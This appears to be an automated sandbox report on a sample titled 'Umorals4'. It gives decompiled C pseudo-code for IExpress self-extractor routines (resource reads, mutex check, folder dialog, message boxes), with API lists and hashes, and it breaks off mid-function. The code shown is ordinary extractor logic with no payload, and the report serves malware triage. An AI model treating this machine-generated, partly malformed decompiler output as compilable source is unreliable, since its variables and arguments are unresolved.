                  • Instruction ID: cf2080b0d827672f6cb25204c6c7c7a5cdcf8504be3b47a4e0ec668f38e8715c
                  • Opcode Fuzzy Hash: 0ef11d8cc318a8a53dc2399db507bdadda3a5cff84661302ff43c0b130abe5ec
                  • Instruction Fuzzy Hash: 81D0C93200450CABD7003BF2EC0CA4D3E2AEB48222F445000F79982022CB734441AF52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00F32B38(struct HINSTANCE__* __ecx, void* __edx) {
                  				signed int _v8;
                  				char _v268;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t13;
                  				void* _t20;
                  				void* _t23;
                  				void* _t27;
                  				struct HRSRC__* _t31;
                  				intOrPtr _t33;
                  				void* _t43;
                  				void* _t48;
                  				signed int _t65;
                  				struct HINSTANCE__* _t66;
                  				signed int _t67;
                  
                  				_t13 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t13 ^ _t67;
                  				_t65 = 0;
                  				_t66 = __ecx;
                  				_t48 = __edx;
                  				 *0xf39164 = __ecx;
                  				memset(0xf39180, 0, 0x8fc);
                  				memset(0xf38940, 0, 0x32c);
                  				memset(0xf39060, 0, 0x104);
                  				 *0xf3942c = 1;
                  				_t20 = E00F34538("TITLE", 0xf39194, 0x7f);
                  				if(_t20 == 0 || _t20 > 0x80) {
                  					_t64 = 0x4b1;
                  					goto L32;
                  				} else {
                  					_t27 = CreateEventA(0, 1, 1, 0);
                  					 *0xf385cc = _t27;
                  					SetEvent(_t27);
                  					_t64 = 0xf39a74;
                  					if(E00F34538("EXTRACTOPT", 0xf39a74, 4) != 0) {
                  						if(( *0xf39a74 & 0x000000c0) == 0) {
                  							L12:
                  							 *0xf39a84 =  *0xf39a84 & _t65;
                  							if(E00F35B88(_t48, _t48, _t65, _t66) != 0) {
                  								if( *0xf3895a == 0) {
                  									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                  									if(_t31 != 0) {
                  										_t65 = LoadResource(_t66, _t31);
                  									}
                  									if( *0xf381f8 != 0) {
                  										__imp__#17();
                  									}
                  									if( *0xf38944 == 0) {
                  										_t57 = _t65;
                  										if(E00F33587(_t65) == 0) {
                  											goto L33;
                  										} else {
                  											_t33 =  *0xf39a80; // 0x3
                  											_t48 = 1;
                  											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                  												if(( *0xf39a74 & 0x00000100) == 0 || ( *0xf38958 & 0x00000001) != 0 || E00F316B6(_t64, _t66) != 0) {
                  													goto L30;
                  												} else {
                  													_t64 = 0x7d6;
                  													if(E00F363E1(_t57, 0x7d6, _t34, E00F31800, 0x547, 0x83e) != 0x83d) {
                  														goto L33;
                  													} else {
                  														goto L30;
                  													}
                  												}
                  											} else {
                  												L30:
                  												_t23 = _t48;
                  											}
                  										}
                  									} else {
                  										_t23 = 1;
                  									}
                  								} else {
                  									E00F321E7(0xf3895a);
                  									goto L33;
                  								}
                  							} else {
                  								_t64 = 0x520;
                  								L32:
                  								E00F34327(0, _t64, 0, 0, 0x10, 0);
                  								goto L33;
                  							}
                  						} else {
                  							_t64 =  &_v268;
                  							if(E00F34538("INSTANCECHECK",  &_v268, 0x104) == 0) {
                  								goto L3;
                  							} else {
                  								_t43 = CreateMutexA(0, 1,  &_v268);
                  								 *0xf385c8 = _t43;
                  								if(_t43 == 0 || GetLastError() != 0xb7) {
                  									goto L12;
                  								} else {
                  									if(( *0xf39a74 & 0x00000080) == 0) {
                  										_t64 = 0x524;
                  										if(E00F34327(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                  											goto L12;
                  										} else {
                  											goto L11;
                  										}
                  									} else {
                  										_t64 = 0x54b;
                  										E00F34327(0, 0x54b, "Umorals4", 0, 0x10, 0);
                  										L11:
                  										CloseHandle( *0xf385c8);
                  										 *0xf39a88 = 0x800700b7;
                  										goto L33;
                  									}
                  								}
                  							}
                  						}
                  					} else {
                  						L3:
                  						_t64 = 0x4b1;
                  						E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
                  						 *0xf39a88 = 0x80070714;
                  						L33:
                  						_t23 = 0;
                  					}
                  				}
                  				return E00F36C20(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                  			}



















                  APIs
                  • memset.MSVCRT ref: 00F32B67
                  • memset.MSVCRT ref: 00F32B77
                  • memset.MSVCRT ref: 00F32B87
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32BC2
                  • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32BCE
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34570
                    • Part of subcall function 00F34538: LoadResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34579
                    • Part of subcall function 00F34538: LockResource.KERNEL32(00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34580
                    • Part of subcall function 00F34538: FreeResource.KERNEL32(00000000,?,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F3459B
                  • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32C3C
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32C4B
                  • CloseHandle.KERNEL32(Umorals4,00000000,00000020,00000004,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32C98
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofString
                  • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$Umorals4$VERCHECK
                  • API String ID: 816842171-3722801934
                  • Opcode ID: e5768a5013a018e48bd9197f33fabf718d165f1660e894ef7e0d82d30b23d6fc
                  • Instruction ID: 9af7ae33a68eac69a9023f1779be77ae77b95c55cc2a37135b45882acb27b1d6
                  • Opcode Fuzzy Hash: e5768a5013a018e48bd9197f33fabf718d165f1660e894ef7e0d82d30b23d6fc
                  • Instruction Fuzzy Hash: 48512C70B44305ABEBA4AB359C4AB7F369AEB41771F104425F982D61D1DBFCC841F622
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00F330C0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				void* __edi;
                  				void* _t5;
                  				void* _t9;
                  				int _t19;
                  				int _t20;
                  				int _t22;
                  				long _t23;
                  				int _t25;
                  				int _t26;
                  				void* _t28;
                  				int _t29;
                  				int _t30;
                  				int _t33;
                  				int _t34;
                  				int _t35;
                  				int _t39;
                  				void* _t42;
                  				void* _t53;
                  				void* _t57;
                  				struct HWND__* _t58;
                  
                  				_t58 = _a4;
                  				_t5 = _a8 - 0x10;
                  				if(_t5 == 0) {
                  					_push(0);
                  					L32:
                  					EndDialog(_t58, ??);
                  					L33:
                  					__eflags = 1;
                  					return 1;
                  				}
                  				_t9 = _t5 - 0x100;
                  				if(_t9 == 0) {
                  					E00F34239(_t58, GetDesktopWindow());
                  					SetWindowTextA(_t58, "Umorals4");
                  					SendDlgItemMessageA(_t58, 0x835, 0xc5, 0x103, 0);
                  					_t39 = 1;
                  					__eflags =  *0xf39a80 - _t39; // 0x3
                  					if(__eflags == 0) {
                  						EnableWindow(GetDlgItem(_t58, 0x836), 0);
                  					}
                  					L30:
                  					return _t39;
                  				}
                  				if(_t9 == 1) {
                  					_t19 = _a12 - 1;
                  					__eflags = _t19;
                  					if(_t19 == 0) {
                  						_t20 = GetDlgItemTextA(_t58, 0x835, 0xf39224, 0x104);
                  						__eflags = _t20;
                  						if(_t20 == 0) {
                  							L27:
                  							_t53 = 0x4bf;
                  							_push(0);
                  							_push(0x10);
                  							_push(0);
                  							_push(0);
                  							L20:
                  							E00F34327(_t58, _t53);
                  							goto L33;
                  						}
                  						_t22 = E00F33086(0xf39224);
                  						__eflags = _t22;
                  						if(_t22 == 0) {
                  							goto L27;
                  						}
                  						_t23 = GetFileAttributesA(0xf39224);
                  						__eflags = _t23 - 0xffffffff;
                  						if(_t23 != 0xffffffff) {
                  							L21:
                  							E00F364E7(0xf39224, 0x104, 0xf31111);
                  							_t25 = E00F3578F(0xf39224);
                  							__eflags = _t25;
                  							if(_t25 != 0) {
                  								_t39 = 1;
                  								__eflags =  *0xf39224 - 0x5c;
                  								if( *0xf39224 != 0x5c) {
                  									L25:
                  									_t26 = E00F35849(0xf39224, _t39, _t58, _t39);
                  									__eflags = _t26;
                  									if(_t26 == 0) {
                  										goto L30;
                  									}
                  									L26:
                  									EndDialog(_t58, _t39);
                  									goto L30;
                  								}
                  								__eflags =  *0xf39225 - 0x5c;
                  								if( *0xf39225 == 0x5c) {
                  									goto L26;
                  								}
                  								goto L25;
                  							}
                  							_push(0);
                  							_push(0x10);
                  							_push(0);
                  							_push(0);
                  							_t53 = 0x4be;
                  							goto L20;
                  						}
                  						_t28 = E00F34327(_t58, 0x54a, 0xf39224, 0, 0x20, 4);
                  						__eflags = _t28 - 6;
                  						if(_t28 != 6) {
                  							goto L33;
                  						}
                  						_t29 = CreateDirectoryA(0xf39224, 0);
                  						__eflags = _t29;
                  						if(_t29 != 0) {
                  							goto L21;
                  						}
                  						_push(0);
                  						_push(0x10);
                  						_push(0);
                  						_push(0xf39224);
                  						_t53 = 0x4cb;
                  						goto L20;
                  					}
                  					_t30 = _t19 - 1;
                  					__eflags = _t30;
                  					if(_t30 == 0) {
                  						EndDialog(_t58, 0);
                  						 *0xf39a88 = 0x800704c7;
                  						goto L33;
                  					}
                  					__eflags = _t30 != 0x834;
                  					if(_t30 != 0x834) {
                  						goto L33;
                  					}
                  					_t33 = LoadStringA( *0xf39164, 0x3e8, 0xf385d8, 0x200);
                  					__eflags = _t33;
                  					if(_t33 != 0) {
                  						_t34 = E00F34088(_t58, _t42, _t42);
                  						__eflags = _t34;
                  						if(_t34 == 0) {
                  							goto L33;
                  						}
                  						_t35 = SetDlgItemTextA(_t58, 0x835, 0xf387e0);
                  						__eflags = _t35;
                  						if(_t35 != 0) {
                  							goto L33;
                  						}
                  						_t57 = 0x4c0;
                  						L9:
                  						E00F34327(_t58, _t57, 0, 0, 0x10, 0);
                  						_push(0);
                  						goto L32;
                  					}
                  					_t57 = 0x4b1;
                  					goto L9;
                  				}
                  				return 0;
                  			}

                  APIs
                  • LoadStringA.USER32 ref: 00F33119
                  • GetDesktopWindow.USER32 ref: 00F33264
                  • SetWindowTextA.USER32(?,Umorals4), ref: 00F33279
                  • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F33292
                  • GetDlgItem.USER32 ref: 00F332AB
                  • EnableWindow.USER32(00000000), ref: 00F332B2
                  • EndDialog.USER32(?,00000000), ref: 00F332BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Umorals4
                  • API String ID: 2418873061-2569978597
                  • Opcode ID: bd80dee2613eed7e6408991ec4492199ca3cb1cbd76ac51966ae489ebec1ffa6
                  • Instruction ID: b45b618f217ec374bfd695206135df987983b51bb113483bcc28a6ea0736120d
                  • Opcode Fuzzy Hash: bd80dee2613eed7e6408991ec4492199ca3cb1cbd76ac51966ae489ebec1ffa6
                  • Instruction Fuzzy Hash: 13410670B442147BE720AB365C8DF7B395EEB85B71F104124FA46E61D0DAA8DA01F2A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00F33380(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				void* _t9;
                  				void* _t12;
                  				void* _t13;
                  				void* _t17;
                  				void* _t26;
                  				void* _t28;
                  				struct HWND__* _t40;
                  				void* _t41;
                  				void* _t48;
                  				struct HWND__* _t50;
                  
                  				_t9 = _a8 - 0x10;
                  				if(_t9 == 0) {
                  					_t48 = 1;
                  					__eflags = 1;
                  					L21:
                  					_push(0);
                  					 *0xf39218 = _t48;
                  					L22:
                  					EndDialog(_a4, ??);
                  					L23:
                  					return _t48;
                  				}
                  				_t12 = _t9 - 0xf2;
                  				if(_t12 == 0) {
                  					_t48 = 1;
                  					__eflags = _a12 - 0x1b;
                  					if(_a12 != 0x1b) {
                  						goto L23;
                  					}
                  					goto L21;
                  				}
                  				_t13 = _t12 - 0xe;
                  				if(_t13 == 0) {
                  					_t50 = _a4;
                  					 *0xf385c0 = _t50;
                  					E00F34239(_t50, GetDesktopWindow());
                  					__eflags =  *0xf381f8; // 0x1
                  					if(__eflags != 0) {
                  						SendMessageA(GetDlgItem(_t50, 0x83b), 0x464, 0, 0xbb9);
                  						SendMessageA(GetDlgItem(_t50, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                  					}
                  					SetWindowTextA(_t50, "Umorals4");
                  					_t17 = CreateThread(0, 0, E00F34E80, 0, 0, 0xf385d0);
                  					 *0xf387d8 = _t17;
                  					__eflags = _t17;
                  					if(_t17 != 0) {
                  						L17:
                  						return 1;
                  					} else {
                  						E00F34327(_t50, 0x4b8, 0, 0, 0x10, 0);
                  						_push(0);
                  						_push(_t50);
                  						L16:
                  						EndDialog();
                  						goto L17;
                  					}
                  				}
                  				_t26 = _t13 - 1;
                  				if(_t26 == 0) {
                  					_t48 = 1;
                  					__eflags = _a12 - 2;
                  					if(_a12 != 2) {
                  						goto L23;
                  					}
                  					ResetEvent( *0xf385cc);
                  					_t40 =  *0xf385c0; // 0x0
                  					_t28 = E00F34327(_t40, 0x4b2, 0xf31111, 0, 0x20, 4);
                  					__eflags = _t28 - 6;
                  					if(_t28 == 6) {
                  						L11:
                  						 *0xf39218 = _t48;
                  						SetEvent( *0xf385cc);
                  						_t41 =  *0xf387d8; // 0x0
                  						E00F33514(_t41);
                  						_push(0);
                  						goto L22;
                  					}
                  					__eflags = _t28 - 1;
                  					if(_t28 == 1) {
                  						goto L11;
                  					}
                  					SetEvent( *0xf385cc);
                  					goto L23;
                  				}
                  				if(_t26 == 0xe90) {
                  					TerminateThread( *0xf387d8, 0);
                  					_push(_a12);
                  					_push(_a4);
                  					goto L16;
                  				}
                  				return 0;
                  			}

                  APIs
                  • TerminateThread.KERNEL32(00000000), ref: 00F333C0
                  • ResetEvent.KERNEL32 ref: 00F333E4
                  • SetEvent.KERNEL32(00F31111,00000000,00000020,00000004), ref: 00F33415
                  • GetDesktopWindow.USER32 ref: 00F3344C
                  • GetDlgItem.USER32 ref: 00F33478
                  • SendMessageA.USER32(00000000), ref: 00F3347F
                  • GetDlgItem.USER32 ref: 00F33493
                  • SendMessageA.USER32(00000000), ref: 00F3349A
                  • SetWindowTextA.USER32(?,Umorals4), ref: 00F334A7
                  • CreateThread.KERNEL32(00000000,00000000,Function_00004E80,00000000,00000000,00F385D0), ref: 00F334BB
                  • EndDialog.USER32(?,00000000), ref: 00F334DD
                  • EndDialog.USER32(?,00000000), ref: 00F33501
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                  • String ID: Umorals4
                  • API String ID: 2406144884-264535404
                  • Opcode ID: 8f43f10f68149ff27d537f476a9cb86dc4a012dc48ba2865eed5e2f216b60618
                  • Instruction ID: 6bb0d199cb01e18c2f11fc4783e0cc4b9b5d2e81037f4a5b52e39d6fced702c9
                  • Opcode Fuzzy Hash: 8f43f10f68149ff27d537f476a9cb86dc4a012dc48ba2865eed5e2f216b60618
                  • Instruction Fuzzy Hash: ED310A32600359BBC7629F25EC0CE2B3E7AE785B71F144114FA42911B0CB799A02FFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00F34088(char __ecx) {
                  				char* _v8;
                  				_Unknown_base(*)()* _v12;
                  				_Unknown_base(*)()* _v16;
                  				_Unknown_base(*)()* _v20;
                  				char* _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				_Unknown_base(*)()* _t26;
                  				_Unknown_base(*)()* _t28;
                  				_Unknown_base(*)()* _t29;
                  				_Unknown_base(*)()* _t32;
                  				char _t42;
                  				char* _t44;
                  				char* _t61;
                  				void* _t63;
                  				char* _t65;
                  				struct HINSTANCE__* _t66;
                  				char _t67;
                  				void* _t71;
                  				char _t76;
                  				intOrPtr _t85;
                  
                  				_t67 = __ecx;
                  				_t66 = LoadLibraryA("SHELL32.DLL");
                  				if(_t66 == 0) {
                  					_t63 = 0x4c2;
                  					L22:
                  					E00F34327(_t67, _t63, 0, 0, 0x10, 0);
                  					return 0;
                  				}
                  				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                  				_v12 = _t26;
                  				if(_t26 == 0) {
                  					L20:
                  					FreeLibrary(_t66);
                  					_t63 = 0x4c1;
                  					goto L22;
                  				}
                  				_t28 = GetProcAddress(_t66, 0xc3);
                  				_v20 = _t28;
                  				if(_t28 == 0) {
                  					goto L20;
                  				}
                  				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                  				_v16 = _t29;
                  				if(_t29 == 0) {
                  					goto L20;
                  				}
                  				_t76 =  *0xf39060; // 0x0
                  				if(_t76 != 0) {
                  					L10:
                  					 *0xf387e0 = 0;
                  					_v52 = _t67;
                  					_v48 = 0;
                  					_v44 = 0;
                  					_v40 = 0xf385d8;
                  					_v36 = 1;
                  					_v32 = E00F34060;
                  					_v28 = 0xf39060;
                  					 *0xf3a290( &_v52);
                  					_t32 =  *_v12();
                  					if(_t71 != _t71) {
                  						asm("int 0x29");
                  					}
                  					_v12 = _t32;
                  					if(_t32 != 0) {
                  						 *0xf3a290(_t32, 0xf39060);
                  						 *_v16();
                  						if(_t71 != _t71) {
                  							asm("int 0x29");
                  						}
                  						if( *0xf39060 != 0) {
                  							E00F31485(0xf387e0, 0x104, 0xf39060);
                  						}
                  						 *0xf3a290(_v12);
                  						 *_v20();
                  						if(_t71 != _t71) {
                  							asm("int 0x29");
                  						}
                  					}
                  					FreeLibrary(_t66);
                  					_t85 =  *0xf387e0; // 0x0
                  					return 0 | _t85 != 0x00000000;
                  				} else {
                  					GetTempPathA(0x104, 0xf39060);
                  					_t61 = 0xf39060;
                  					_t4 =  &(_t61[1]); // 0xf39061
                  					_t65 = _t4;
                  					do {
                  						_t42 =  *_t61;
                  						_t61 =  &(_t61[1]);
                  					} while (_t42 != 0);
                  					_t5 = _t61 - _t65 + 0xf39060; // 0x1e720c1
                  					_t44 = CharPrevA(0xf39060, _t5);
                  					_v8 = _t44;
                  					if( *_t44 == 0x5c &&  *(CharPrevA(0xf39060, _t44)) != 0x3a) {
                  						 *_v8 = 0;
                  					}
                  					goto L10;
                  				}
                  			}

                  APIs
                  • LoadLibraryA.KERNEL32(SHELL32.DLL,?), ref: 00F3409A
                  • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F340B0
                  • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F340C7
                  • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F340DE
                  • GetTempPathA.KERNEL32(00000104,00F39060), ref: 00F34103
                  • CharPrevA.USER32(00F39060,01E720C1), ref: 00F34126
                  • CharPrevA.USER32(00F39060,00000000), ref: 00F3413A
                  • FreeLibrary.KERNEL32(00000000), ref: 00F341F5
                  • FreeLibrary.KERNEL32(00000000), ref: 00F34209
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                  • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                  • API String ID: 1865808269-1731843650
                  • Opcode ID: 7deda5d761969f5dd9358a9727146790fc1ba16a76a5b6261965b8b86df9a1cf
                  • Instruction ID: 2e7b152b8b8ba10804028c7d841c6bb3a52ef2b44d36f0ec7027c1236cab758c
                  • Opcode Fuzzy Hash: 7deda5d761969f5dd9358a9727146790fc1ba16a76a5b6261965b8b86df9a1cf
                  • Instruction Fuzzy Hash: 4141E6B4E44308AFD716AF75DC94A6E7B7AEB45370F040058E941A3251CBB9EC41FB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00F34327(struct HWND__* __ecx, int __edx, void* _a4, long _a8, int _a12, void* _a16) {
                  				signed int _v8;
                  				char _v64;
                  				char _v576;
                  				long _v580;
                  				long _v584;
                  				struct HWND__* _v588;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t38;
                  				void* _t41;
                  				signed int _t44;
                  				intOrPtr _t48;
                  				signed int _t49;
                  				signed int _t54;
                  				intOrPtr _t57;
                  				void* _t58;
                  				long _t60;
                  				intOrPtr _t63;
                  				intOrPtr _t64;
                  				intOrPtr _t65;
                  				int _t71;
                  				signed int _t75;
                  				intOrPtr* _t79;
                  				long _t83;
                  				intOrPtr* _t84;
                  				void* _t87;
                  				void* _t88;
                  				void* _t89;
                  				void* _t90;
                  				intOrPtr* _t92;
                  				signed int _t96;
                  
                  				_t82 = __edx;
                  				_t38 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t38 ^ _t96;
                  				_v588 = __ecx;
                  				_t91 = "LoadString() Error.  Could not load string resource.";
                  				_t75 = 0xd;
                  				_t41 = memcpy( &_v64, _t91, _t75 << 2);
                  				_t87 = _t91 + _t75 + _t75;
                  				_v584 = _t41;
                  				_v580 = _a8;
                  				asm("movsb");
                  				if(( *0xf38958 & 0x00000001) != 0) {
                  					_t44 = 1;
                  				} else {
                  					_t71 = 0;
                  					_v576 = 0;
                  					LoadStringA( *0xf39164, _t82,  &_v576, 0x200);
                  					if(_v576 != 0) {
                  						_t92 = _v580;
                  						_t79 =  &_v576;
                  						_t82 = _t79 + 1;
                  						if(_t92 == 0) {
                  							_t91 = _v584;
                  							if(_t91 == 0) {
                  								do {
                  									_t48 =  *_t79;
                  									_t79 = _t79 + 1;
                  								} while (_t48 != 0);
                  								_t91 = _t79 - _t82 + 1;
                  								_t49 = LocalAlloc(0x40, _t91);
                  								_t87 = _t49;
                  								if(_t87 == 0) {
                  									goto L6;
                  								} else {
                  									_t82 = _t91;
                  									_t81 = _t87;
                  									E00F31485(_t87, _t91,  &_v576);
                  									goto L24;
                  								}
                  							} else {
                  								do {
                  									_t57 =  *_t79;
                  									_t79 = _t79 + 1;
                  								} while (_t57 != 0);
                  								_t81 = _t79 - _t82;
                  								_t83 = _t91;
                  								_t88 = _t83 + 1;
                  								do {
                  									_t58 =  *_t83;
                  									_t83 = _t83 + 1;
                  								} while (_t58 != 0);
                  								_t82 = _t83 - _t88;
                  								_t60 = _t81 + 0x64 + _t83 - _t88;
                  								_v580 = _t60;
                  								_t49 = LocalAlloc(0x40, _t60);
                  								_t87 = _t49;
                  								if(_t87 == 0) {
                  									goto L6;
                  								} else {
                  									E00F31524(_t87, _v580,  &_v576, _t91);
                  									goto L24;
                  								}
                  							}
                  						} else {
                  							do {
                  								_t63 =  *_t79;
                  								_t79 = _t79 + 1;
                  							} while (_t63 != 0);
                  							_t81 = _t79 - _t82;
                  							_t84 = _v584;
                  							_t89 = _t84 + 1;
                  							do {
                  								_t64 =  *_t84;
                  								_t84 = _t84 + 1;
                  							} while (_t64 != 0);
                  							_t82 = _t84 - _t89;
                  							_t90 = _t92 + 1;
                  							do {
                  								_t65 =  *_t92;
                  								_t92 = _t92 + 1;
                  							} while (_t65 != 0);
                  							_t91 = _t92 - _t90 + 0x64 + _t82 + _t81;
                  							_t49 = LocalAlloc(0x40, _t92 - _t90 + 0x64 + _t82 + _t81);
                  							_t87 = _t49;
                  							if(_t87 == 0) {
                  								goto L6;
                  							} else {
                  								_push(_v580);
                  								E00F31524(_t87, _t91,  &_v576, _v584);
                  								L24:
                  								MessageBeep(_a12);
                  								if(E00F3671D(_t71, _t82) != 0 && E00F366C2(_t81, _t81) != 0) {
                  									_t71 = 0x180000;
                  								}
                  								_t54 = MessageBoxA(_v588, _t87, "Umorals4", _t71);
                  								_t91 = _t54;
                  								LocalFree(_t87);
                  								_t44 = _t54;
                  							}
                  						}
                  					} else {
                  						if(E00F3671D(0, _t82) != 0 && E00F366C2(0, 0) != 0) {
                  							_t71 = 0x180000;
                  						}
                  						_t49 = MessageBoxA(_v588,  &_v64, "Umorals4", _t71);
                  						L6:
                  						_t44 = _t49 | 0xffffffff;
                  					}
                  				}
                  				return E00F36C20(_t44, _t71, _v8 ^ _t96, _t82, _t87, _t91);
                  			}

                  APIs
                  • LoadStringA.USER32 ref: 00F3438D
                  • MessageBoxA.USER32 ref: 00F343C9
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F3441B
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F34478
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F344B0
                  • MessageBeep.USER32(00000000), ref: 00F344D3
                  • MessageBoxA.USER32 ref: 00F3450A
                  • LocalFree.KERNEL32(00000000), ref: 00F34513
                    • Part of subcall function 00F3671D: GetVersionExA.KERNEL32(?,00000000,?), ref: 00F3676C
                    • Part of subcall function 00F3671D: GetSystemMetrics.USER32 ref: 00F367A5
                    • Part of subcall function 00F3671D: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F367CA
                    • Part of subcall function 00F3671D: RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,?,0000000C), ref: 00F367F2
                    • Part of subcall function 00F3671D: RegCloseKey.ADVAPI32(?), ref: 00F36800
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                  • String ID: LoadString() Error. Could not load string resource.$Umorals4
                  • API String ID: 3244514340-100266132
                  • Opcode ID: da36609e851109a3c5209bcbb3b98547b8e6a74127904d2501025745e3d97a7b
                  • Instruction ID: 7fec1cb4a3bffbb088b94597a70a8d204960c56bf38687b01910af58ac7f1398
                  • Opcode Fuzzy Hash: da36609e851109a3c5209bcbb3b98547b8e6a74127904d2501025745e3d97a7b
                  • Instruction Fuzzy Hash: 63512772D00219ABCF219F24CC48BAA7B75EF81334F1441A4ED49A7251DB35AE45FF60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00F325DB(CHAR* __ecx, char* _a4) {
                  				signed int _v8;
                  				char _v268;
                  				char _v269;
                  				CHAR* _v276;
                  				int _v280;
                  				void* _v284;
                  				int _v288;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t23;
                  				intOrPtr _t34;
                  				int _t45;
                  				int* _t50;
                  				CHAR* _t52;
                  				CHAR* _t61;
                  				char* _t62;
                  				int _t63;
                  				CHAR* _t64;
                  				signed int _t65;
                  
                  				_t52 = __ecx;
                  				_t23 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t23 ^ _t65;
                  				_t62 = _a4;
                  				_t50 = 0;
                  				_t61 = __ecx;
                  				_v276 = _t62;
                  				 *((char*)(__ecx)) = 0;
                  				if( *_t62 != 0x23) {
                  					_t63 = 0x104;
                  					goto L14;
                  				} else {
                  					_t64 = _t62 + 1;
                  					_v269 = CharUpperA( *_t64);
                  					_v276 = CharNextA(CharNextA(_t64));
                  					_t63 = 0x104;
                  					_t34 = _v269;
